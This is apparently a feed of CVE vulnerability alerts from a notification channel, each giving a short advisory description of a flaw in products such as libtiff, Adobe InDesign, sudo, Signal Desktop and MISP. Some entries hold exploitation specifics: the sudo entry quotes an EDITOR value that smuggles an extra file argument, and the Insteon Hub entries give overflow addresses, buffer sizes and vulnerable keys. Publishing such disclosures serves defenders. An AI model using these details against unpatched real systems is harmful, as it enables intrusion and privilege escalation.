🚨 CVE-2017-20169A vulnerability, which was classified as critical, has been found in GGGGGGGG ToN-MasterServer. Affected by this issue is some unknown functionality of the file public_html/irc_updater/svr_request_pub.php. The manipulation leads to sql injection. The name of the patch is 3a4c7e6d51bf95760820e3245e06c6e321a7168a. It is recommended to apply a patch to fix this issue. VDB-218306 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-23 20:29:53 |
🚨 CVE-2022-42704A cross-site scripting (XSS) vulnerability in Employee Service Center (esc) and Service Portal (sp) in ServiceNow Quebec, Rome, and San Diego allows remote attackers to inject arbitrary web script via the Standard Ticket Conversations widget.🎖@cveNotify |
|
| 2023-01-23 20:29:52 |
🚨 CVE-2022-3159The APDFL.dll contains a stack-based buffer overflow vulnerability that could be triggered while parsing specially crafted PDF files. This could allow an attacker to execute code in the context of the current process.🎖@cveNotify |
|
| 2023-01-23 20:29:51 |
🚨 CVE-2022-3160The APDFL.dll contains an out-of-bounds write past the fixed-length heap-based buffer while parsing specially crafted PDF files. This could allow an attacker to execute code in the context of the current process.🎖@cveNotify |
|
| 2023-01-23 20:29:47 |
🚨 CVE-2021-35065The glob-parent package before 6.0.1 for Node.js allows ReDoS (regular expression denial of service) attacks against the enclosure regular expression.🎖@cveNotify |
|
| 2023-01-23 20:29:46 |
🚨 CVE-2023-0105A flaw was found in Keycloak. This flaw allows impersonation and lockout due to the email trust not being handled correctly in Keycloak. An attacker can shadow other users with the same email and lockout or impersonate them.🎖@cveNotify |
|
| 2023-01-23 20:29:45 |
🚨 CVE-2022-42895There is an infoleak vulnerability in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_parse_conf_req function which can be used to leak kernel pointers remotely. We recommend upgrading past commit https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e https://www.google.com/url🎖@cveNotify |
|
| 2023-01-23 20:29:41 |
🚨 CVE-2022-41778Delta Electronics InfraSuite Device Master versions 00.00.01a and prior deserialize user-supplied data provided through the Device-DataCollect service port without proper verification. An attacker could provide malicious serialized objects to execute arbitrary code upon deserialization.🎖@cveNotify |
|
| 2023-01-23 20:29:40 |
🚨 CVE-2022-3161The APDFL.dll contains a memory corruption vulnerability while parsing specially crafted PDF files. This could allow an attacker to execute code in the context of the current process.🎖@cveNotify |
|
| 2023-01-23 20:29:39 |
🚨 CVE-2023-22601InHand Networks InRouter 302, prior to version IR302 V3.5.56, and InRouter 615, prior to version InRouter6XX-S-V2.3.0.r5542, contain vulnerability CWE-330: Use of Insufficiently Random Values. They do not properly randomize MQTT ClientID parameters. An unauthorized user could calculate this parameter and use it to gather additional information about other InHand devices managed on the same cloud platform.🎖@cveNotify |
|
| 2023-01-23 20:29:38 |
🚨 CVE-2023-22600InHand Networks InRouter 302, prior to version IR302 V3.5.56, and InRouter 615, prior to version InRouter6XX-S-V2.3.0.r5542, contain vulnerability CWE-284: Improper Access Control. They allow unauthenticated devices to subscribe to MQTT topics on the same network as the device manager. An unauthorized user who knows of an existing topic name could send and receive messages to and from that topic. This includes the ability to send GET/SET configuration commands, reboot commands, and push firmware updates.🎖@cveNotify |
|
| 2023-01-23 17:30:05 |
🚨 CVE-2022-46472Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /hss/classes/Users.php?f=delete.🎖@cveNotify |
|
| 2023-01-23 17:30:04 |
🚨 CVE-2023-21595Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-23 17:30:03 |
🚨 CVE-2023-21596Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-23 17:30:02 |
🚨 CVE-2023-21598Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-23 17:30:01 |
🚨 CVE-2023-21594Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-23 17:29:57 |
🚨 CVE-2023-21599Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-23 17:29:56 |
🚨 CVE-2023-22958The Syracom Secure Login plugin before 3.1.1.0 for Jira may allow spoofing of 2FA PIN validation via the plugins/servlet/twofactor/public/pinvalidation target parameter.🎖@cveNotify |
|
| 2023-01-23 17:29:55 |
🚨 CVE-2022-38725An integer overflow in the RFC3164 parser in One Identity syslog-ng 3.0 through 3.37 allows remote attackers to cause a Denial of Service via crafted syslog input that is mishandled by the tcp or network function. syslog-ng Premium Edition 7.0.30 and syslog-ng Store Box 6.10.0 are also affected.🎖@cveNotify |
|
| 2023-01-23 17:29:54 |
🚨 CVE-2021-36630DDOS reflection amplification vulnerability in eAut module of Ruckus Wireless SmartZone controller that allows remote attackers to perform DOS attacks via crafted request.🎖@cveNotify |
|
| 2023-01-23 17:29:53 |
🚨 CVE-2022-32222A cryptographic vulnerability exists on Node.js on linux in versions of 18.x prior to 18.4.0 which allowed a default path for openssl.cnf that might be accessible under some circumstances to a non-admin user instead of /etc/ssl as was the case in versions prior to the upgrade to OpenSSL 3.🎖@cveNotify |
|
| 2023-01-23 17:29:49 |
🚨 CVE-2018-1000820neo4j-contrib neo4j-apoc-procedures version before commit 45bc09c contains a XML External Entity (XXE) vulnerability in XML Parser that can result in Disclosure of confidential data, denial of service, SSRF, port scanning. This vulnerability appears to have been fixed in after commit 45bc09c.🎖@cveNotify |
|
| 2023-01-23 17:29:48 |
🚨 CVE-2023-21590Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-23 17:29:47 |
🚨 CVE-2023-21591Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-23 17:29:46 |
🚨 CVE-2023-21592Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-23 17:29:45 |
🚨 CVE-2023-22947** DISPUTED ** Insecure folder permissions in the Windows installation path of Shibboleth Service Provider (SP) before 3.4.1 allow an unprivileged local attacker to escalate privileges to SYSTEM via DLL planting in the service executable's folder. This occurs because the installation goes under C:\opt (rather than C:\Program Files) by default. NOTE: the vendor disputes the significance of this report, stating that "We consider the ACLs a best effort thing" and "it was a documentation mistake."🎖@cveNotify |
|
| 2023-01-23 17:29:41 |
🚨 CVE-2022-46438A cross-site scripting (XSS) vulnerability in the /admin/article_category.php component of DouPHP v1.7 20221118 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the description parameter.🎖@cveNotify |
|
| 2023-01-23 17:29:40 |
🚨 CVE-2023-23456A heap-based buffer overflow issue was discovered in UPX in PackTmt::pack() in p_tmt.cpp file. The flow allows an attacker to cause a denial of service (abort) via a crafted file.🎖@cveNotify |
|
| 2023-01-23 17:29:39 |
🚨 CVE-2023-0293The Mediamatic – Media Library Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on its AJAX actions in versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to change image categories, which it uses to arrange them in folder views.🎖@cveNotify |
|
| 2023-01-23 17:29:38 |
🚨 CVE-2017-16301Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd sn_ex, at 0x9d01ad14, the value for the `flg` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-23 17:29:37 |
🚨 CVE-2022-3811The EU Cookie Law for GDPR/CCPA WordPress plugin through 3.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-01-23 14:29:37 |
🚨 CVE-2017-16302Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd sn_ex, at 0x9d01ad78, the value for the `cmd1` key is copied using `strcpy` to the buffer at `$sp+0x2d0`.This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-23 14:29:36 |
🚨 CVE-2017-16303Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd sn_ex, at 0x9d01addc, the value for the `cmd2` key is copied using `strcpy` to the buffer at `$sp+0x280`.This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-23 14:29:35 |
🚨 CVE-2017-16322Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_sonos, at 0x9d01e228, the value for the `c_group` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-23 12:29:50 |
🚨 CVE-2023-24068Signal Desktop before 6.2.0 on Windows, Linux, and macOS allows an attacker to modify conversation attachments within the attachments.noindex directory. Client mechanisms fail to validate modifications of existing cached files, resulting in an attacker's ability to insert malicious code into pre-existing attachments or replace them completely. A threat actor can forward the existing attachment in the corresponding conversation to external groups, and the name and size of the file will not change, allowing the malware to masquerade as another file.🎖@cveNotify |
|
| 2023-01-23 12:29:44 |
🚨 CVE-2023-24069Signal Desktop before 6.2.0 on Windows, Linux, and macOS allows an attacker to obtain potentially sensitive attachments sent in messages from the attachments.noindex directory. Cached attachments are not effectively cleared. In some cases, even after a self-initiated file deletion, an attacker can still recover the file if it was previously replied to in a conversation. (Local filesystem access is needed by the attacker.)🎖@cveNotify |
|
| 2023-01-23 06:29:44 |
🚨 CVE-2022-46959An issue in the component /admin/backups/work-dir of Sonic v1.0.4 allows attackers to execute a directory traversal.🎖@cveNotify |
|
| 2023-01-23 06:29:42 |
🚨 CVE-2023-23314An arbitrary file upload vulnerability in the /api/upload component of zdir v3.2.0 allows attackers to execute arbitrary code via a crafted .ssh file.🎖@cveNotify |
|
| 2023-01-23 06:29:40 |
🚨 CVE-2023-24070app/View/AuthKeys/authkey_display.ctp in MISP through 2.4.167 has an XSS in authkey add via a Referer field.🎖@cveNotify |
|
| 2023-01-23 06:29:38 |
🚨 CVE-2022-48281processCropSelections in tools/tiffcrop.c in LibTIFF through 4.5.0 has a heap-based buffer overflow (e.g., "WRITE of size 307203") via a crafted TIFF image.🎖@cveNotify |
|
| 2023-01-23 00:29:36 |
🚨 CVE-2023-0435Excessive Attack Surface in GitHub repository pyload/pyload prior to 0.5.0b3.dev41.🎖@cveNotify |
|
| 2023-01-22 21:29:37 |
🚨 CVE-2023-24058Booked Scheduler 2.5.5 allows authenticated users to create and schedule events for any other user via a modified userId value to reservation_save.php. NOTE: 2.5.5 is a version from 2014; the latest version of Booked Scheduler is not affected. However, LabArchives Scheduler (Sep 6, 2022 Feature Release) is affected.🎖@cveNotify |
|
| 2023-01-22 12:29:39 |
🚨 CVE-2023-24059Grand Theft Auto V for PC allows attackers to achieve partial remote code execution or modify files on a PC, as exploited in the wild in January 2023.🎖@cveNotify |
|
| 2023-01-22 12:29:37 |
🚨 CVE-2023-24058Booked Scheduler 2.5.5 allows authenticated users to create and schedule events for any other user via a modified userId value to reservation_save.php. NOTE: 2.5.5 is a version from 2014.🎖@cveNotify |
|
| 2023-01-22 06:29:44 |
🚨 CVE-2023-24055** DISPUTED ** KeePass through 2.53 (in a default installation) allows an attacker, who has write access to the XML configuration file, to obtain the cleartext passwords by adding an export trigger. NOTE: the vendor's position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC.🎖@cveNotify |
|
| 2023-01-22 06:29:43 |
🚨 CVE-2023-22809In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.🎖@cveNotify |
|
| 2023-01-22 06:29:39 |
🚨 CVE-2023-23456A heap-based buffer overflow issue was discovered in UPX in PackTmt::pack() in p_tmt.cpp file. The flow allows an attacker to cause a denial of service (abort) via a crafted file.🎖@cveNotify |
|
| 2023-01-22 06:29:38 |
🚨 CVE-2023-21538.NET Denial of Service Vulnerability.🎖@cveNotify |
|
| 2023-01-22 06:29:37 |
🚨 CVE-2023-24044A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header.🎖@cveNotify |
|
| 2023-01-22 06:29:36 |
🚨 CVE-2023-0434Improper Input Validation in GitHub repository pyload/pyload prior to 0.5.0b3.dev40.🎖@cveNotify |
|
| 2023-01-21 21:29:39 |
🚨 CVE-2023-22617A remote attacker might be able to cause infinite recursion in PowerDNS Recursor 4.8.0 via a DNS query that retrieves DS records for a misconfigured domain, because QName minimization is used in QM fallback mode. This is fixed in 4.8.1.🎖@cveNotify |
|
| 2023-01-21 18:29:37 |
🚨 CVE-2023-0433Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1225.🎖@cveNotify |
|
| 2023-01-21 16:29:37 |
🚨 CVE-2023-22884Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow, Apache Software Foundation Apache Airflow MySQL Provider.This issue affects Apache Airflow: before 2.5.1; Apache Airflow MySQL Provider: before 4.0.0.🎖@cveNotify |
|
| 2023-01-21 07:30:01 |
🚨 CVE-2023-24040** UNSUPPORTED WHEN ASSIGNED ** dtprintinfo in Common Desktop Environment 1.6 has a bug in the parser of lpstat (an invoked external command) during listing of the names of available printers. This allows low-privileged local users to inject arbitrary printer names via the $HOME/.printers file. This injection allows those users to manipulate the control flow and disclose memory contents on Solaris 10 systems. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-21 07:29:59 |
🚨 CVE-2023-24042A race condition in LightFTP through 2.2 allows an attacker to achieve path traversal via a malformed FTP request. A handler thread can use an overwritten context->FileName.🎖@cveNotify |
|
| 2023-01-21 07:29:58 |
🚨 CVE-2020-36655Yii Yii2 Gii before 2.2.2 allows remote attackers to execute arbitrary code via the Generator.php messageCategory field. The attacker can embed arbitrary PHP code into the model file.🎖@cveNotify |
|
| 2023-01-21 07:29:57 |
🚨 CVE-2023-24038The HTML-StripScripts module through 1.06 for Perl allows _hss_attval_style ReDoS because of catastrophic backtracking for HTML content with certain style attributes.🎖@cveNotify |
|
| 2023-01-21 07:29:55 |
🚨 CVE-2022-3970A vulnerability was found in LibTIFF. It has been classified as critical. This affects the function TIFFReadRGBATileExt of the file libtiff/tif_getimage.c. The manipulation leads to integer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 227500897dfb07fb7d27f7aa570050e62617e3be. It is recommended to apply a patch to fix this issue. The identifier VDB-213549 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-21 07:29:54 |
🚨 CVE-2022-3570Multiple heap buffer overflows in tiffcrop.c utility in libtiff library Version 4.4.0 allows attacker to trigger unsafe or out of bounds memory access via crafted TIFF image file which could result into application crash, potential information disclosure or any other context-dependent impact🎖@cveNotify |
|
| 2023-01-21 07:29:53 |
🚨 CVE-2022-3597LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemcpy in libtiff/tif_unix.c:346 when called from extractImageSection, tools/tiffcrop.c:6826, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191.🎖@cveNotify |
|
| 2023-01-21 07:29:52 |
🚨 CVE-2022-3598LibTIFF 4.4.0 has an out-of-bounds write in extractContigSamplesShifted24bits in tools/tiffcrop.c:3604, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit cfbb883b.🎖@cveNotify |
|
| 2023-01-21 07:29:50 |
🚨 CVE-2022-3599LibTIFF 4.4.0 has an out-of-bounds read in writeSingleSection in tools/tiffcrop.c:7345, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit e8131125.🎖@cveNotify |
|
| 2023-01-21 07:29:49 |
🚨 CVE-2022-3626LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemset in libtiff/tif_unix.c:340 when called from processCropSelections, tools/tiffcrop.c:7619, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191.🎖@cveNotify |
|
| 2023-01-21 07:29:48 |
🚨 CVE-2022-3627LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemcpy in libtiff/tif_unix.c:346 when called from extractImageSection, tools/tiffcrop.c:6860, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191.🎖@cveNotify |
|
| 2023-01-21 07:29:47 |
🚨 CVE-2022-1354A heap buffer overflow flaw was found in Libtiffs' tiffinfo.c in TIFFReadRawDataStriped() function. This flaw allows an attacker to pass a crafted TIFF file to the tiffinfo tool, triggering a heap buffer overflow issue and causing a crash that leads to a denial of service.🎖@cveNotify |
|
| 2023-01-21 07:29:45 |
🚨 CVE-2022-1355A stack buffer overflow flaw was found in Libtiffs' tiffcp.c in main() function. This flaw allows an attacker to pass a crafted TIFF file to the tiffcp tool, triggering a stack buffer overflow issue, possibly corrupting the memory, and causing a crash that leads to a denial of service.🎖@cveNotify |
|
| 2023-01-21 07:29:44 |
🚨 CVE-2022-2867libtiff's tiffcrop utility has a uint32_t underflow that can lead to out of bounds read and write. An attacker who supplies a crafted file to tiffcrop (likely via tricking a user to run tiffcrop on it with certain parameters) could cause a crash or in some cases, further exploitation.🎖@cveNotify |
|
| 2023-01-21 07:29:43 |
🚨 CVE-2022-2868libtiff's tiffcrop utility has a improper input validation flaw that can lead to out of bounds read and ultimately cause a crash if an attacker is able to supply a crafted file to tiffcrop.🎖@cveNotify |
|
| 2023-01-21 07:29:42 |
🚨 CVE-2022-2869libtiff's tiffcrop tool has a uint32_t underflow which leads to out of bounds read and write in the extractContigSamples8bits routine. An attacker who supplies a crafted file to tiffcrop could trigger this flaw, most likely by tricking a user into opening the crafted file with tiffcrop. Triggering this flaw could cause a crash or potentially further exploitation.🎖@cveNotify |
|
| 2023-01-21 07:29:41 |
🚨 CVE-2022-34526A stack overflow was discovered in the _TIFFVGetField function of Tiffsplit v4.4.0. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted TIFF file parsed by the "tiffsplit" or "tiffcrop" utilities.🎖@cveNotify |
|
| 2023-01-21 07:29:39 |
🚨 CVE-2022-2056Divide By Zero error in tiffcrop in libtiff 4.4.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f3a5e010.🎖@cveNotify |
|
| 2023-01-21 07:29:38 |
🚨 CVE-2022-2057Divide By Zero error in tiffcrop in libtiff 4.4.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f3a5e010.🎖@cveNotify |
|
| 2023-01-21 07:29:37 |
🚨 CVE-2022-2058Divide By Zero error in tiffcrop in libtiff 4.4.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f3a5e010.🎖@cveNotify |
|
| 2023-01-21 02:29:36 |
🚨 CVE-2023-22742libgit2 is a cross-platform, linkable library implementation of Git. When using an SSH remote with the optional libssh2 backend, libgit2 does not perform certificate checking by default. Prior versions of libgit2 require the caller to set the `certificate_check` field of libgit2's `git_remote_callbacks` structure - if a certificate check callback is not set, libgit2 does not perform any certificate checking. This means that by default - without configuring a certificate check callback, clients will not perform validation on the server SSH keys and may be subject to a man-in-the-middle attack. Users are encouraged to upgrade to v1.4.5 or v1.5.1. Users unable to upgrade should ensure that all relevant certificates are manually checked.🎖@cveNotify |
|
| 2023-01-20 23:30:01 |
🚨 CVE-2023-0052SAUTER Controls Nova 200–220 Series with firmware version 3.3-006 and prior and BACnetstac version 4.2.1 and prior allows the execution of commands without credentials. As Telnet and file transfer protocol (FTP) are the only protocols available for device management, an unauthorized user could access the system and modify the device configuration, which could result in the unauthorized user executing unrestricted malicious commands.🎖@cveNotify |
|
| 2023-01-20 23:30:00 |
🚨 CVE-2023-22726act is a project which allows for local running of github actions. The artifact server that stores artifacts from Github Action runs does not sanitize path inputs. This allows an attacker to download and overwrite arbitrary files on the host from a Github Action. This issue may lead to privilege escalation. The /upload endpoint is vulnerable to path traversal as filepath is user controlled, and ultimately flows into os.Mkdir and os.Open. The /artifact endpoint is vulnerable to path traversal as the path is variable is user controlled, and the specified file is ultimately returned by the server. This has been addressed in version 0.2.40. Users are advised to upgrade. Users unable to upgrade may, during implementation of Open and OpenAtEnd for FS, ensure to use ValidPath() to check against path traversal or clean the user-provided paths manually.🎖@cveNotify |
|
| 2023-01-20 23:29:59 |
🚨 CVE-2023-24026In MISP 2.4.167, app/webroot/js/event-graph.js has an XSS vulnerability via an event-graph preview payload.🎖@cveNotify |
|
| 2023-01-20 23:29:58 |
🚨 CVE-2023-24027In MISP 2.4.167, app/webroot/js/action_table.js allows XSS via a network history name.🎖@cveNotify |
|
| 2023-01-20 23:29:57 |
🚨 CVE-2023-24028In MISP 2.4.167, app/Controller/Component/ACLComponent.php has incorrect access control for the decaying import function.🎖@cveNotify |
|
| 2023-01-20 23:29:53 |
🚨 CVE-2022-46732Even if the authentication fails for local service authentication, the requested command could still execute regardless of authentication status.🎖@cveNotify |
|
| 2023-01-20 23:29:52 |
🚨 CVE-2023-21587Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-20 23:29:51 |
🚨 CVE-2022-39182H C Mingham-Smith Ltd - Tardis 2000 Privilege escalation.Version 1.6 is vulnerable to privilege escalation which may allow a malicious actor to gain system privileges.🎖@cveNotify |
|
| 2023-01-20 23:29:50 |
🚨 CVE-2022-39183Moodle Plugin - SAML Auth may allow Open Redirect through unspecified vectors.🎖@cveNotify |
|
| 2023-01-20 23:29:46 |
🚨 CVE-2023-21588Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-20 23:29:45 |
🚨 CVE-2020-25502Cybereason EDR version 19.1.282 and above, 19.2.182 and above, 20.1.343 and above, and 20.2.X and above has a DLL hijacking vulnerability, which could allow a local attacker to execute code with elevated privileges.🎖@cveNotify |
|
| 2023-01-20 23:29:44 |
🚨 CVE-2021-33642When a file is processed, an infinite loop occurs in next_inline() of the more_curly() function.🎖@cveNotify |
|
| 2023-01-20 23:29:39 |
🚨 CVE-2023-24025CRYSTALS-DILITHIUM (in Post-Quantum Cryptography Selected Algorithms 2022) in PQClean d03da30 may allow universal forgeries of digital signatures via a template side-channel attack because of intermediate data leakage of one vector.🎖@cveNotify |
|
| 2023-01-20 23:29:38 |
🚨 CVE-2020-15953LibEtPan through 1.9.4, as used in MailCore 2 through 0.6.3 and other products, has a STARTTLS buffering issue that affects IMAP, SMTP, and POP3. When a server sends a "begin TLS" response, the client reads additional data (e.g., from a meddler-in-the-middle attacker) and evaluates it in a TLS context, aka "response injection."🎖@cveNotify |
|
| 2023-01-20 23:29:37 |
🚨 CVE-2022-48090Tramyardg hotel-mgmt-system version 2022.4 is vulnerable to SQL Injection via /app/dao/CustomerDAO.php.🎖@cveNotify |
|
| 2023-01-20 23:29:36 |
🚨 CVE-2020-16145Roundcube Webmail before 1.3.15 and 1.4.8 allows stored XSS in HTML messages during message display via a crafted SVG document. This issue has been fixed in 1.4.8 and 1.3.15.🎖@cveNotify |
|
| 2023-01-20 22:30:23 |
🚨 CVE-2019-20096In the Linux kernel before 5.1, there is a memory leak in __feat_register_sp() in net/dccp/feat.c, which may cause denial of service, aka CID-1d3ff0950e2b.🎖@cveNotify |
|
| 2023-01-20 22:30:19 |
🚨 CVE-2023-0245A vulnerability, which was classified as critical, has been found in SourceCodester Online Flight Booking Management System. This issue affects some unknown processing of the file add_contestant.php. The manipulation of the argument add_contestant leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-218153 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-20 22:30:18 |
🚨 CVE-2020-15890LuaJit through 2.1.0-beta3 has an out-of-bounds read because __gc handler frame traversal is mishandled.🎖@cveNotify |
|
| 2023-01-20 22:30:17 |
🚨 CVE-2019-4343IBM Cognos Analytics 11.0 and 11.1 allows overly permissive cross-origin resource sharing which could allow an attacker to transfer private information. An attacker could exploit this vulnerability to access content that should be restricted. IBM X-Force ID: 161422.🎖@cveNotify |
|
| 2023-01-20 22:30:13 |
🚨 CVE-2020-13625PHPMailer before 6.1.6 contains an output escaping bug when the name of a file attachment contains a double quote character. This can result in the file type being misinterpreted by the receiver or any mail relay processing the message.🎖@cveNotify |
|
| 2023-01-20 22:30:12 |
🚨 CVE-2020-6509Use after free in extensions in Google Chrome prior to 83.0.4103.116 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension.🎖@cveNotify |
|
| 2023-01-20 22:30:11 |
🚨 CVE-2019-20093The PoDoFo::PdfVariant::DelayedLoad function in PdfVariant.h in PoDoFo 0.9.6 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted file, because of ImageExtractor.cpp.🎖@cveNotify |
|
| 2023-01-20 22:30:10 |
🚨 CVE-2019-20085TVT NVMS-1000 devices allow GET /.. Directory Traversal🎖@cveNotify |
|
| 2023-01-20 22:30:07 |
🚨 CVE-2022-45888An issue was discovered in the Linux kernel through 6.0.9. drivers/char/xillybus/xillyusb.c has a race condition and use-after-free during physical removal of a USB device.🎖@cveNotify |
|
| 2023-01-20 22:30:06 |
🚨 CVE-2022-45886An issue was discovered in the Linux kernel through 6.0.9. drivers/media/dvb-core/dvb_net.c has a .disconnect versus dvb_device_open race condition that leads to a use-after-free.🎖@cveNotify |
|
| 2023-01-20 22:30:05 |
🚨 CVE-2019-20054In the Linux kernel before 5.0.6, there is a NULL pointer dereference in drop_sysctl_table() in fs/proc/proc_sysctl.c, related to put_links, aka CID-23da9588037e.🎖@cveNotify |
|
| 2023-01-20 18:30:03 |
🚨 CVE-2019-12746An issue was discovered in Open Ticket Request System (OTRS) Community Edition 5.0.x through 5.0.36 and 6.0.x through 6.0.19. A user logged into OTRS as an agent might unknowingly disclose their session ID by sharing the link of an embedded ticket article with third parties. This identifier can be then be potentially abused in order to impersonate the agent user.🎖@cveNotify |
|
| 2023-01-20 18:30:02 |
🚨 CVE-2019-14497ModuleEditor::convertInstrument in tracker/ModuleEditor.cpp in MilkyTracker 1.02.00 has a heap-based buffer overflow.🎖@cveNotify |
|
| 2023-01-20 18:30:01 |
🚨 CVE-2019-19781An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.🎖@cveNotify |
|
| 2023-01-20 18:30:00 |
🚨 CVE-2019-14496LoaderXM::load in LoaderXM.cpp in milkyplay in MilkyTracker 1.02.00 has a stack-based buffer overflow.🎖@cveNotify |
|
| 2023-01-20 18:29:56 |
🚨 CVE-2019-12497An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.8, Community Edition 6.0.x through 6.0.19, and Community Edition 5.0.x through 5.0.36. In the customer or external frontend, personal information of agents (e.g., Name and mail address) can be disclosed in external notes.🎖@cveNotify |
|
| 2023-01-20 18:29:55 |
